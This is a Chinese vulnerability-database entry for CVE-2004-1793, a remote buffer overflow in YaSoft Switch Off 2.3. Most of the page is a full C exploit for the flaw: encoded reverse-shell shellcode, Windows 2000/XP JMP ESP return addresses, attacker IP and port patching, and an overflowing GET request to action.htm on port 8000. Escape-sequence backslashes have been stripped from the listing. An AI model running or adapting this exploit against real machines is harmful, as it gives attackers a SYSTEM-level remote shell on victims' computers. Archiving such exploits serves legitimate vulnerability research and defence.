YaSoft Switch SendMsg远程缓冲区溢出漏洞

YaSoft Switch SendMsg远程缓冲区溢出漏洞

漏洞ID 1107609 漏洞类型 边界条件错误
发布时间 2004-01-02 更新时间 2005-10-20
图片[1]-YaSoft Switch SendMsg远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2004-1793
图片[2]-YaSoft Switch SendMsg远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200412-1166
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23509
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1166
|漏洞详情
SwitchOff是一款简单易用的托盘式系统工具,可自动执行经常使用的操作,如关闭或重启动计算机,关闭拨号连接等。SwitchOff不正确处理用户提交的消息请求,远程攻击者可以利用这个漏洞对服务程序进行缓冲区溢出,精心提交数据可能以SYSTEM进程权限在系统上执行任意指令。问题存在action.htm脚本中,由于对用户提交给’message’参数的数据缺少正确的边界缓冲区检查,提交超长字符串作为此参数数据,可触发缓冲区溢出,可能以SYSTEM进程权限在系统上执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/9340/info

A vulnerability has been identified in the YaSoft Switch Off software package when handling message requests. The buffer overrun condition exists in the 'swnet.dll' module of the software due to insufficient bounds checking performed by the affected component. The overflow may be caused by sending an excessively long 'message' parameter to the application. This may make it possible for a remote user to execute arbitrary code through a vulnerable server.

/*******************************************************************/
/* [Crpt] Switch Off 2.3 exploit by MrNice [Crpt] */
/* --------------------------------------------------------------- */
/* */
/* Coder : MrNice */
/* Released on : 07/01/2004 */
/* Tested on : 2k Sp0 & Xp sp0 */
/* Advisory : www.securiteam.com/windowsntfocus/5BP011FBPI.html*/
/* Tech : The overflow can be caused by supplying an overly*/
/* long 'message' parameter to the application. */
/* */
/* If a password has been set, you will have to have*/
/* logged in to the server before issuing a */
/* malicious request to cause the overflow. */
/*******************************************************************/
/* www.coromputer.net && #coromputer on underet */
/******C***O***R***O***M***P***U***T***E***R*****2***0***0***4******/

#ifdef _WIN32
#include <winsock.h>
#include <windows.h>
#define close closesocket
#pragma comment (lib,"ws2_32")
#else
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//#define JMP_ESP_2K "x1FxE5xC7x77" //2k sp0 FR
//#define JMP_ESP_XP "xE7x80x9Cx71" //xp pro sp0 FR

#define JMP_ESP_2K "xB8x64x75x71"
#define JMP_ESP_XP "xC1x1Cx35x77"


char ReversShell[]= //Dexorer without call (ff..) coded by MrNice
"x83xECx50xD9xE1xD9x34x24x5Bx5Bx5Bx5Bx80xEBxE7x33"
"xC9x66x81xC1x4Fx01x80x33x96x43xE2xFA"
//Reverse Shell from Metasploit
"x7exa6x96x96x96xd5xdbxd2x96x71xefx50xefx7ax6fx3c"
"xf6x4fx9fx63x3bx5dx7bx6axadx18xd8x98x7axe8x4ex74"
"xe5x3bx4fx93x58xe4x68x25x80xc1xc5xa4xc9xa5xa4xb8"
"xd2xdaxdax96x97xcdxc2x1fx73x1fxcbx96xfcxa6xcfxf2"
"x1dx97x1dxd6x9ax1dxe6x8ax3bx1dxcex9ex7dx9ax1bxc1"
"xb2xc7xc4x69x46x1fx55xcfx7dx86xfcx9exc8x97x78xfc"
"x9excfx1dxebx96x16x6fx92xe2x72xc7xc5x69xa2x19x7e"
"x15x96x96x96xcfx1fx92x18x74x7dxa7x69xf0x17x7ax06"
"x97xc2xfex97x97x96x96x69xc3x8exc1xc1xc1xc1xd1xc1"
"xd1xc1x69xc3x82x1fx55xa7x69xfex56x3ex96x61xfex94"
"x96xb4x87x1fx77xfcx86xc7xc5x69xc3x86x13x56xe3xd2"
"x1bxaaxb2xa7x56xfcx83xcfx65x3dx50xd2xb2x86xd2x68"
"xd2xb2xabx1fxcaxb2xdex1fxcaxb2xdax1fxcaxb2xc6x1b"
"xd2xb2x86xc2xc6xc7xc7xc7xd7xc7xdfxc7xc7x69xe3x96"
"xc7x69xc3xbex1fx77xfex69x69x69x69x69xa7x69xc3xb2"
"xc1x69xc3x9ax69xc3xb6xc5xc3xc0xc1x1dxfaxb2x8ex1d"
"xd3xaax1dxc2x93xeex97x7cx1dxdcx8ex1dxccxb6x97x7d"
"x75xa4xdfx1dxa2x1dx97x78xa7x69x6axa7x56x3axaex76"
"xe2x91x57x59x9bx97x51x7dx64xadxeaxb2x82xe3x77x1d"
"xccxb2x97x7dxf0x1dx9axddx1dxccx8ax97x7dx1dx92x1d"
"x97x7ex7dx94xa7x56x1fx7cxc9xc8xcbxcdx54x9ex96";

  
//Fonction who set the shellcode coded by Kralor[crpt]
void set_sc(char *rhost, int rport, char *shellc0de)
   {
  unsigned int ip=0;
  unsigned short port=0;
  char *port_to_shell="",*ip1="";

  ip = inet_addr(rhost); ip1 = (char*)&ip;
  shellc0de[182]=ip1[0]^0x96;shellc0de[183]=ip1[1]^0x96;
  shellc0de[184]=ip1[2]^0x96; shellc0de[185]=ip1[3]^0x96;

  port = htons(rport);
  port_to_shell = (char *) &port;
  shellc0de[189]=port_to_shell[0]^0x96;
  shellc0de[190]=port_to_shell[1]^0x96;

   }

void banner()
   {
    printf("nt [Crpt] Switch Off 2.3 Remote Exploit by MrNice [Crpt]n");
  printf("tt www.coromputer.net && Undernet #coromputern");
        printf("t---------------------------------------------------------------nn");
   }
   
void usage(char *exe)
   {
    printf("nt [Crpt] Switch Off 2.3 Remote Exploit by MrNice [Crpt]n");
  printf("tt www.coromputer.net && Undernet #coromputern");
        printf("t---------------------------------------------------------------nn");
        printf("Syntax : %s <ip_vulnerable> <your_ip> <listening_port> <cible>n",exe);
        printf("nCible : t0 - Windows 2000 (default)n");
        printf("tt1 - Windows Xpnn");
        exit (-1);
   }
   
int main(int argc, char *argv[])
{
  int hsocket;

  struct hostent *host;
    struct in_addr adresseIP;
    struct sockaddr_in adressesocket;
   
    char BadString[700],Request[800];

  int i,len,cible=0;
  
  #ifdef _WIN32
  WSADATA wsaData;
  #endif
  
  if(argc<4)
     {
       usage(argv[0]);
   }
  
  if(argc>4)
     {
       cible=atoi(argv[4]);
     }
     
  banner();
  
  #ifdef _WIN32
    if(WSAStartup(0x101,&wsaData))
     {
    printf("[-] Unable to load winsockn");
                exit (-1);
     }
  else
     {
       printf("[+] Winsock loadedn");
     }
  #endif

  //Cr�ation de la socket
    if((hsocket=socket(AF_INET,SOCK_STREAM,0))==-1)
    {
    printf("[-] Can't creat Socketn");
    exit (-1);
    }
  else
     {
    printf("[+] Socket createdn");
     }
   
   //GetHostByName()
   if((host=gethostbyname(argv[1]))==0)
   {
   printf("[-] Can't acquire remote infon");
   close(hsocket);
   exit (-1);
   }
  else
     {
    printf("[+] Remote info Acquiredn");
     }

   memcpy(&adresseIP,host->h_addr,host->h_length);
  
   //Preparation de la struct sockaddr_in
   memset(&adressesocket,0,sizeof(struct sockaddr_in));
   adressesocket.sin_family=AF_INET;
   adressesocket.sin_port=htons(8000);
   memcpy(&adressesocket.sin_addr,host->h_addr,host->h_length);

  
   if(connect(hsocket,(struct sockaddr *)&adressesocket,sizeof(struct sockaddr_in))==-1)
   {
   printf("[-] Can't connect on %s:8000n",argv[1]);
   close(hsocket);
   exit (-1);
   }
  else
     {
    printf("[+] Connected on %s:8000n",argv[1]);
     }
  
  set_sc(argv[2], atoi(argv[3]),ReversShell);
  printf("[+] Reverse ShellCode builtn",argv[1]);
  
  for(i=0;i<700;i++)
     {
    BadString[i]=(char)0x90;
     }
     
  for(i=260;i<623;i++)
     {
    BadString[i]=ReversShell[i-260];
     }
     
  if(cible==0)
     {
    memcpy(&BadString[256],JMP_ESP_2K,4);
     }
  else
     {
       memcpy(&BadString[256],JMP_ESP_XP,4);
     }
     
  BadString[700]=0x00;
  
  memset(Request,'x00',sizeof(Request));
  sprintf(Request,"GET /action.htm?action=SendMsg&message=%s HTTP/1.1rn"
      "Host: 10.0.0.6:8000rn"
      "rn",BadString);
        
  printf("[+] BadString constructedn");
  
  if((len=send(hsocket,Request,strlen(Request),0))==-1)
      {
    printf("[-] Error on sending BadStringn");
      close(hsocket);
      exit (-1);
      }
     else
     {
     printf("[+] BadString Sended (%d)n",len);
     }
  return 0;
   }
|参考资料

来源:XF
名称:switch-off-swnet-bo(14124)
链接:http://xforce.iss.net/xforce/xfdb/14124
来源:BID
名称:9340
链接:http://www.securityfocus.com/bid/9340
来源:BUGTRAQ
名称:20040102SwitchOffMultipleVulnerabilities
链接:http://www.securityfocus.com/archive/1/348693
来源:OSVDB
名称:3309
链接:http://www.osvdb.org/3309
来源:www.elitehaven.net
链接:http://www.elitehaven.net/switchoff.txt
来源:SECTRACK
名称:1008581
链接:http://securitytracker.com/id?1008581
来源:SECUNIA
名称:10521
链接:http://secunia.com/advisories/10521
来源:NSFOCUS
名称:5877
链接:http://www.nsfocus.net/vulndb/5877

相关推荐: IMP/MSWordView /tmp File Permission Vulnerability

IMP/MSWordView /tmp File Permission Vulnerability 漏洞ID 1104214 漏洞类型 Access Validation Error 发布时间 2000-04-22 更新时间 2000-04-22 CVE编号 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享